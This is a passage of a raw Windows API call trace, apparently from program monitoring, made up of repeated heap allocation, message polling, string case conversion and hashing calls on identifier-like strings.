hHeap=0x25c0000) returned 1 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0208.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.164] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0208.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0208.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0208.164] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0208.164] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.165] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.165] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.165] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.165] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.165] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.165] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0208.165] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.165] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0208.165] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.165] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.165] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.165] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.165] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.165] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.166] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0208.166] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.166] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.166] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0208.166] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.166] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0208.166] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.166] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.166] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0208.166] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0208.166] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.166] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.166] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.166] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.166] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.166] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.171] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0208.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.171] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0208.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.171] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.172] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0208.172] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.172] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.172] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.172] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.172] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0208.172] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.172] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.172] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.172] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.173] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.173] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.173] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.173] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.173] CryptHashData (hHash=0xaa58e0, pbData=0x24b17d8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0208.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0208.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0208.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0208.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0208.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0208.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0208.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0208.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0208.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0208.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0208.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0208.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0208.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0208.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0208.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0208.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0208.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0208.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0208.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0208.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0208.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0208.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0208.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0208.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0208.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0208.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0208.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0208.177] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0208.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0208.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0208.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0208.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0208.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0208.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0208.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0208.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0208.178] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0208.178] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0208.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0208.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.179] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.179] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0208.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0208.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.179] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0208.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0208.180] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 